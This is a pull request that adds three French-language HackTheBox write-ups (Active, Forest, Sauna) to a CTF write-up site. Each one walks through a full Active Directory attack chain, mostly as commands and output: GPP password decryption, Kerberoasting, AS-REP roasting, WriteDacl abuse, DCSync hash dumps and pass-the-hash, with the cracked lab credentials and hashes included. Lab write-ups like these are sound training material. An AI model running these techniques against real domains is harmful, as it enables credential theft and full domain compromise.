### PR TITLE
Ajout de 3 writeups HackTheBox machines

### DIFF
--- a/public/writeups.json
+++ b/public/writeups.json
@@ -1,5 +1,29 @@
 [
   {
+    "slug": "writeup/hackthebox/machines/sauna",
+    "title": "Sauna",
+    "platform": "HackTheBox",
+    "updated": "2026-04-21T22:08:00.000Z",
+    "author": null,
+    "author_github_url": null
+  },
+  {
+    "slug": "writeup/hackthebox/machines/forest",
+    "title": "Forest",
+    "platform": "HackTheBox",
+    "updated": "2026-04-21T22:08:00.000Z",
+    "author": null,
+    "author_github_url": null
+  },
+  {
+    "slug": "writeup/hackthebox/machines/active",
+    "title": "Active",
+    "platform": "HackTheBox",
+    "updated": "2026-04-21T22:08:00.000Z",
+    "author": null,
+    "author_github_url": null
+  },
+  {
     "slug": "writeup/vulnlab/manage-easy",
     "title": "Manage",
     "platform": "VulnLab",

--- a/src/content/docs/writeup/hackthebox/machines/active.mdx
+++ b/src/content/docs/writeup/hackthebox/machines/active.mdx
@@ -1,0 +1,244 @@
+---
+title: Active
+description: WU Active
+categories: [Writeup]
+tags: [writeup]
+template: doc
+sidebar:
+  order: 2
+  badge:
+    text: 'easy'
+    variant: success
+---
+
+| OS | Difficulty | Target |
+|----|----|----|
+| Windows | <span style="color:green">**EASY**</span> | 10.129.7.157 |
+
+## Flags
+
+| Flag | Emplacement |
+|------|-------------|
+| User | `C:\Users\SVC_TGS\Desktop\user.txt` |
+| Root | `C:\Users\Administrator\Desktop\root.txt` |
+
+## Résumé
+
+1. **Énumération SMB anonyme** : Accès au partage Replication
+2. **Group Policy Preferences** : Décryptage du mot de passe AES (MS14-025)
+3. **Kerberoasting** : Attaque contre le SPN de l'Administrator
+4. **Crackage de dictionnaire** : Obtention des credentials Administrator
+5. **Accès système** : Shell SYSTEM via PsExec
+
+---
+
+## Configuration et Reconnaissance
+
+### Configuration de l'Environnement
+
+```bash
+export TARGET=10.129.7.157
+export DOMAIN=active.htb
+echo "$TARGET active.htb DC.active.htb" >> /etc/hosts
+```
+
+### Scan Nmap
+
+```bash
+nmap -p- $TARGET -sV -sC -oN nmap_full.txt
+```
+
+**Ports Critiques Identifiés :**
+
+| Port | Service | Signification |
+|------|---------|--------------|
+| 53 | DNS | Tentatives de transfert de zone |
+| 88 | Kerberos | Vecteurs AS-REP/Kerberoasting |
+| 389 | LDAP | Énumération anonyme |
+| 445 | SMB | Accès aux partages - vecteur principal |
+| 636 | LDAPS | LDAP chiffré |
+| 3268 | Global Catalog | Énumération LDAP étendue |
+
+**Observation Clé :** Signature SMB requise, éliminant les attaques directes de relay NTLM.
+
+## Énumération SMB Anonyme
+
+### Découverte des Partages
+
+```bash
+smbclient -L //$TARGET -N
+smbmap -H $TARGET -u '' -p ''
+```
+
+**Résultat :** Accès anonyme accordé au partage `Replication` avec accès READ.
+
+### Extraction du Contenu des Partages
+
+```bash
+smbclient //$TARGET/Replication -N -c 'recurse ON; prompt OFF; mget *'
+find . -type f
+```
+
+**Fichiers Clés Localisés :**
+```
+./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/
+  MACHINE/Preferences/Groups/Groups.xml
+  MACHINE/Registry.pol
+  MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
+```
+
+## Décryptage du Mot de Passe GPP (MS14-025)
+
+### Contexte de la Vulnérabilité
+
+Les Group Policy Preferences permettaient aux administrateurs de configurer des comptes et services via des templates GPO, avec des mots de passe chiffrés en AES-256 et une clé publiquement divulguée.
+
+### Analyse de Groups.xml
+
+```xml
+<?xml version="1.0" encoding="utf-8"?>
+<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
+  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
+        name="active.htb\\SVC_TGS"
+        image="2"
+        changed="2018-07-18 20:46:06"
+        uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
+    <Properties action="U"
+                newName=""
+                fullName=""
+                description=""
+                cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
+                changeLogon="0"
+                noChange="1"
+                neverExpires="1"
+                acctDisabled="0"
+                userName="active.htb\\SVC_TGS"/>
+  </User>
+</Groups>
+```
+
+### Décryptage
+
+```bash
+gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
+```
+
+**Output :** `GPPstillStandingStrong2k18`
+
+### Credentials Obtenus
+
+```
+SVC_TGS:GPPstillStandingStrong2k18
+```
+
+```bash
+export USER=SVC_TGS
+export PASS=GPPstillStandingStrong2k18
+```
+
+## Attaque Kerberoasting
+
+### Découverte des SPN
+
+```bash
+GetUserSPNs.py $DOMAIN/$USER:$PASS -dc-ip $TARGET -outputfile kerb.hash
+```
+
+**Résultat :**
+```
+ServicePrincipalName  Name              MemberOf
+active/CIFS:445       Administrator     CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb
+```
+
+### Explication de l'Attaque
+
+Quand un compte authentifié du domaine demande un ticket de service, le KDC fournit un TGS chiffré avec le hash NTLM du compte de service cible, sans vérifier les droits d'accès réels. Ce ticket exportable peut être cracké hors ligne.
+
+La mauvaise configuration critique : Le nom principal de service était directement associé au compte Administrator plutôt qu'à un compte de service dédié.
+
+### Crackage du Hash
+
+```bash
+hashcat -m 13100 kerb.hash /usr/share/wordlists/rockyou.txt
+```
+
+**Mode 13100 :** Kerberos 5 TGS-REP etype 23 (RC4)
+
+**Output :**
+```
+$krb5tgs$23$*Administrator$ACTIVE.HTB$...:Ticketmaster1968
+Status: Cracked
+Time: 5 secs
+```
+
+### Credentials Obtenus
+
+```
+Administrator:Ticketmaster1968
+```
+
+## Accès Système et Escalade de Privilèges
+
+### Exploitation PsExec
+
+```bash
+psexec.py active.htb/Administrator:Ticketmaster1968@$TARGET
+```
+
+**Mécanisme :** L'outil se connecte via SMB, télécharge un binaire de service exécutable vers ADMIN$, l'enregistre et le démarre comme service Windows, puis établit un named pipe pour l'exécution de commandes en contexte SYSTEM.
+
+**Output :**
+```
+Microsoft Windows [Version 6.1.7601]
+C:\Windows\system32>
+```
+
+### Récupération des Flags
+
+```cmd
+type C:\Users\SVC_TGS\Desktop\user.txt
+type C:\Users\Administrator\Desktop\root.txt
+```
+
+## Séquence de Commandes Complète
+
+```bash
+# Setup
+export TARGET=10.129.7.157
+export DOMAIN=active.htb
+echo "$TARGET active.htb DC.active.htb" >> /etc/hosts
+
+# Énumération
+smbclient -L //$TARGET -N
+smbmap -H $TARGET -u '' -p ''
+smbclient //$TARGET/Replication -N -c 'recurse ON; prompt OFF; mget *'
+
+# Décryptage GPP
+gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
+export USER=SVC_TGS PASS=GPPstillStandingStrong2k18
+
+# Kerberoasting
+GetUserSPNs.py $DOMAIN/$USER:$PASS -dc-ip $TARGET -outputfile kerb.hash
+hashcat -m 13100 kerb.hash /usr/share/wordlists/rockyou.txt
+
+# Accès Système
+psexec.py active.htb/Administrator:Ticketmaster1968@$TARGET
+```
+
+## Résumé des Outils et Techniques
+
+| Outil | Usage |
+|------|--------|
+| smbclient | Énumération de partages SMB et transfert de fichiers |
+| smbmap | Cartographie des permissions sur les partages |
+| gpp-decrypt | Décryptage AES des Group Policy Preferences |
+| GetUserSPNs.py | Énumération Kerberos SPN et extraction TGS |
+| hashcat | Crackage de hash NTLM par dictionnaire |
+| psexec.py | Exécution de commandes distantes en SYSTEM |
+
+## Vulnérabilités Clés Exploitées
+
+1. **MS14-025 :** Clés de chiffrement publiquement divulguées pour les mots de passe GPP
+2. **Kerberoasting :** Mot de passe faible sur le SPN du domaine (compte Administrator)
+3. **Permissions Excessives :** Compte de service avec droits de modification SPN
+4. **Politique de Mot de Passe Faible :** Credentials crackables par dictionnaire

--- a/src/content/docs/writeup/hackthebox/machines/forest.mdx
+++ b/src/content/docs/writeup/hackthebox/machines/forest.mdx
@@ -1,0 +1,218 @@
+---
+title: Forest
+description: WU Forest
+categories: [Writeup]
+tags: [writeup]
+template: doc
+sidebar:
+  order: 2
+  badge:
+    text: 'easy'
+    variant: success
+---
+
+| OS | Difficulty | Target |
+|----|----|----|
+| Windows | <span style="color:green">**EASY**</span> | 10.129.4.254 |
+
+## Flags
+
+| Flag | Emplacement |
+|------|-------------|
+| User | `C:\Users\svc-alfresco\Desktop\user.txt` |
+| Root | `C:\Users\Administrator\Desktop\root.txt` |
+
+## Résumé
+
+1. **Énumération LDAP/RPC anonyme** : Découverte des utilisateurs du domaine
+2. **AS-REP Roasting** : Attaque contre svc-alfresco sans pré-authentification
+3. **WinRM Shell** : Accès initial avec les credentials crackés
+4. **Analyse BloodHound** : Mapping des chemins de privilèges
+5. **WriteDacl Abuse** : Exploitation des permissions Exchange
+6. **DCSync** : Dump des hashes pour obtenir Administrator
+
+---
+
+## Configuration Initiale
+
+```bash
+export TARGET=10.129.4.254
+export DOMAIN=htb.local
+export DC=forest.htb.local
+echo "$TARGET forest.htb.local htb.local FOREST" >> /etc/hosts
+getent hosts htb.local
+```
+
+## Reconnaissance
+
+### Scan Nmap
+
+```bash
+nmap -p- $TARGET -sV -sC -oN nmap_full.txt
+```
+
+**Ports critiques identifiés :**
+- 53 (DNS)
+- 88 (Kerberos)
+- 389 (LDAP)
+- 445 (SMB)
+- 636 (LDAPS)
+- 3268 (Global Catalog)
+- 5985 (WinRM)
+- 9389 (mc-nmf - indicateur Exchange)
+
+### Énumération LDAP
+
+Requête du rootDSE :
+```bash
+ldapsearch -x -H ldap://$TARGET -b "" -s base
+```
+
+Récupération de la structure du domaine :
+```bash
+ldapsearch -x -H ldap://$TARGET -b "dc=htb,dc=local" > ldap.txt
+grep "^dn:" ldap.txt | grep -v "CN=Configuration\|CN=Schema\|CN=System"
+```
+
+Filtrage des comptes DONT_REQ_PREAUTH :
+```bash
+ldapsearch -x -H ldap://$TARGET -b "dc=htb,dc=local" \
+  "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" \
+  sAMAccountName userAccountControl
+```
+
+### Énumération RPC
+
+```bash
+enum4linux-ng -A $TARGET > enum4linux.txt
+grep "username:" enum4linux.txt | awk '{print $2}' > users.txt
+```
+
+**Utilisateurs découverts :**
+- sebastien
+- lucinda
+- **svc-alfresco** (ACB: 0x00010210 - vulnérable)
+- andy
+- mark
+- santi
+
+### Analyse des Account Control Bits
+
+La valeur 0x00010210 indique :
+- 0x00000200: NORMAL_ACCOUNT
+- 0x00000010: HOMEDIR_REQUIRED
+- 0x00010000: DONT_REQ_PREAUTH (indicateur de vulnérabilité)
+
+Seul svc-alfresco possédait cette configuration vulnérable.
+
+## Attaque AS-REP Roasting
+
+### Explication de la Vulnérabilité
+
+Quand DONT_REQ_PREAUTH est activé, le KDC répond aux requêtes d'authentification sans valider le demandeur. La réponse contient du matériel chiffré avec le hash NTLM du compte cible, extractible pour un crackage hors ligne.
+
+### Exécution de l'Attaque
+
+```bash
+GetNPUsers.py htb.local/ -no-pass -usersfile users.txt -dc-ip $TARGET
+```
+
+### Crackage du Hash
+
+```bash
+hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
+```
+
+**Résultat :** svc-alfresco / s3rvice
+
+## Accès Initial
+
+### Connexion WinRM
+
+```bash
+evil-winrm -i $TARGET -u svc-alfresco -p s3rvice
+whoami
+# Output: htb\svc-alfresco
+```
+
+## Énumération Post-Exploitation
+
+### Collecte de Données BloodHound
+
+```bash
+netexec ldap $TARGET -u svc-alfresco -p s3rvice \
+  --bloodhound --dns-server $TARGET -c all
+```
+
+### Chemin d'Attaque Découvert
+
+L'analyse révèle : svc-alfresco maintient une appartenance dans Service Accounts, qui appartient à Privileged IT Accounts, qui appartient à Account Operators. Account Operators possède des droits GenericAll sur Exchange Windows Permissions, qui détient des permissions WriteDacl sur l'objet domaine HTB.LOCAL.
+
+## Escalade de Privilèges
+
+### Étape 1 : Charger PowerView
+
+```powershell
+# Depuis l'hôte Linux
+cp /opt/resources/windows/PowerSploit/Recon/PowerView.ps1 /workspace/Forest/
+
+# Depuis la session evil-winrm
+upload PowerView.ps1
+. .\PowerView.ps1
+```
+
+### Étape 2 : Ajouter svc-alfresco à Exchange Windows Permissions
+
+```powershell
+Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco
+Get-DomainGroupMember -Identity "Exchange Windows Permissions"
+```
+
+### Étape 3 : Accorder les Droits DCSync
+
+L'actualisation du token de compte est critique - les tokens NTLM ne se mettent pas à jour dynamiquement. Il faut fournir des credentials frais :
+
+```powershell
+$username = "htb\svc-alfresco"
+$password = "s3rvice"
+$secstr = New-Object -TypeName System.Security.SecureString
+$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
+$cred = new-object -typename System.Management.Automation.PSCredential `
+  -argumentlist $username, $secstr
+
+Add-DomainObjectAcl -Credential $Cred `
+  -PrincipalIdentity 'svc-alfresco' `
+  -TargetIdentity 'DC=htb,DC=local' `
+  -Rights DCSync
+```
+
+Vérification :
+```powershell
+Get-ObjectAcl -DistinguishedName "DC=htb,DC=local" -ResolveGUIDs | `
+  Where-Object {$_.SecurityIdentifier -match "svc-alfresco"}
+```
+
+## Dump DCSync
+
+```bash
+netexec smb $TARGET -u svc-alfresco -p s3rvice --ntds
+```
+
+**Hash Clé Extrait :**
+- Administrator NT Hash: 32693b11e6aa90eb43d32c72a07ceea6
+
+## Attaque Pass-the-Hash
+
+```bash
+evil-winrm -i $TARGET -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
+whoami
+# Output: htb\administrator
+```
+
+## Concepts Techniques Clés
+
+**PrivExchange :** La configuration du serveur Exchange hérite de permissions de domaine élevées, permettant l'abus de WriteDacl pour le dump de credentials.
+
+**Protocole DCSync :** Utilise MS-DRSR (Directory Replication Service) pour simuler la réplication de contrôleur de domaine, nécessitant les permissions DS-Replication-Get-Changes et DS-Replication-Get-Changes-All.
+
+**Exploitation WriteDacl :** Permet la modification des ACL du domaine pour accorder des privilèges arbitraires sans accès direct.

--- a/src/content/docs/writeup/hackthebox/machines/sauna.mdx
+++ b/src/content/docs/writeup/hackthebox/machines/sauna.mdx
@@ -1,0 +1,160 @@
+---
+title: Sauna
+description: WU Sauna
+categories: [Writeup]
+tags: [writeup]
+template: doc
+sidebar:
+  order: 2
+  badge:
+    text: 'easy'
+    variant: success
+---
+
+| OS | Difficulty | Target |
+|----|----|----|
+| Windows | <span style="color:green">**EASY**</span> | 10.129.95.180 |
+
+## Flags
+
+| Flag | Emplacement |
+|------|-------------|
+| User | `C:\Users\FSmith\Desktop\user.txt` |
+| Root | `C:\Users\Administrator\Desktop\root.txt` |
+
+## Résumé
+
+1. **Reconnaissance** : Enumération des employés via le site web de la banque
+2. **AS-REP Roasting** : Attaque contre le compte `fsmith` sans pré-authentification
+3. **Initial Access** : Connexion WinRM avec les credentials crackés
+4. **Privilege Escalation** : Découverte d'AutoLogon credentials via le registre
+5. **DCSync** : Exploitation des droits de réplication pour dumper l'Administrator
+
+---
+
+## Reconnaissance
+
+### Configuration initiale
+
+```bash
+export TARGET=10.129.95.180
+export DOMAIN=EGOTISTICAL-BANK.LOCAL
+export DC=sauna.EGOTISTICAL-BANK.LOCAL
+echo "$TARGET EGOTISTICAL-BANK.LOCAL sauna.EGOTISTICAL-BANK.LOCAL SAUNA" >> /etc/hosts
+```
+
+### Scan Nmap
+
+```bash
+nmap -p- $TARGET -sV -sC -oN nmap_full.txt
+```
+
+**Résultats critiques :**
+- Port 53: DNS
+- Port 80: IIS 10.0 (site web Egotistical Bank)
+- Port 88: Kerberos (vulnérable à l'AS-REP Roasting)
+- Port 389: LDAP
+- Port 445: SMB (signature requise)
+- Port 5985: WinRM (accès shell avec credentials valides)
+- **Clock skew** : +7 heures détecté (impact sur les opérations Kerberos)
+
+### Enumération Web
+
+```bash
+curl 10.129.95.180/about.html
+```
+
+**Noms d'employés extraits :**
+- Fergus Smith
+- Shaun Coins
+- Hugo Bear
+- Bowie Taylor
+- Sophie Driver
+- Steven Kerb
+
+## Génération et Validation des Usernames
+
+Génération de candidats avec les conventions courantes :
+- Noms complets (fergussmith, shauncoins, etc.)
+- Initiale + nom (fsmith, scoins, hbear, etc.)
+
+```bash
+kerbrute userenum users.txt -d $DOMAIN --dc $DC
+```
+
+**Résultat** : Seul `fsmith` est un compte AD valide
+
+## Attaque AS-REP Roasting
+
+Le compte `fsmith` a le flag "DONT_REQ_PREAUTH" activé, permettant l'AS-REP Roasting.
+
+```bash
+netexec ldap $DC -u fsmith@EGOTISTICAL-BANK.LOCAL -p '' --asreproast out.asreproast
+```
+
+**Type de hash** : `$krb5asrep$23$` (Kerberos 5 encryption RC4)
+
+```bash
+hashcat -m 18200 out.asreproast /usr/share/wordlists/rockyou.txt
+```
+
+**Credentials crackés** : `fsmith / Thestrokes23`
+
+## Accès Initial via WinRM
+
+```bash
+evil-winrm -i $TARGET -u fsmith -p 'Thestrokes23'
+```
+
+Shell utilisateur obtenu avec succès et récupération du flag user.
+
+## Post-Exploitation : AutoLogon Registry
+
+```powershell
+reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
+reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
+```
+
+**Credentials découverts** : `svc_loanmgr / Moneymakestheworldgoround!`
+
+Ce compte de service possède des droits de réplication dangereux.
+
+## Attaque DCSync pour le Hash Administrator
+
+Le compte `svc_loanmgr` détient les permissions `DS-Replication-Get-Changes-All`, permettant l'exploitation DCSync.
+
+```bash
+date -s "+7 hours" && netexec smb $TARGET -u svc_loanmgr \
+  -p 'Moneymakestheworldgoround!' --ntds --user Administrator
+```
+
+**Résultat** : `Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e`
+
+Hash NT : `823452073d75b9d1cf70ebdf86c7f98e`
+
+## Pass-the-Hash pour l'Accès Administrateur
+
+```bash
+evil-winrm -i $TARGET -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
+```
+
+Flag root obtenu avec succès.
+
+## Défis Techniques Résolus
+
+**Problème de Clock Skew** : La différence de 7 heures entre la machine attaquant et le contrôleur de domaine nécessitait une synchronisation temporelle avant les opérations dépendantes de Kerberos.
+
+**Gestion des Chemins Evil-WinRM** : Le conteneur Docker interprète les chemins relatifs depuis le répertoire de lancement.
+
+**Instabilité BloodHound** : Tentatives de connexion IPv6 et timeouts DNS rendaient la collecte peu fiable.
+
+**netexec vs secretsdump** : `secretsdump.py` d'Impacket connaissait des échecs silencieux dans Exegol v5.1.9, tandis que `netexec` fonctionnait de manière fiable.
+
+## Outils Utilisés
+
+- nmap (scan réseau)
+- kerbrute (énumération de comptes)
+- netexec (opérations LDAP/SMB/DCSync)
+- hashcat (crackage de mots de passe)
+- evil-winrm (shell distant)
+- reg query (examen du registre)


### PR DESCRIPTION
## Summary

Ajout de 3 nouveaux writeups HackTheBox pour enrichir la section machines :

• **Active** - Exploitation GPP password decryption et attaque Kerberoasting
• **Forest** - Techniques WriteDacl abuse et énumération LDAP anonyme  
• **Sauna** - Méthodes AS-REP Roasting et attaque DCSync

## Changements

- 3 fichiers MDX ajoutés dans `src/content/docs/writeup/hackthebox/machines/`
- Mise à jour minimale de `public/writeups.json` (ajout des 3 entrées uniquement)
- Aucune modification des writeups existants
- Format cohérent avec les autres writeups du site

## Test plan

- [x] Génération manuelle propre des entrées JSON
- [x] Vérification du format MDX avec frontmatter
- [x] Structure de dossiers cohérente avec les autres machines
- [x] Diff minimal sans modifications parasites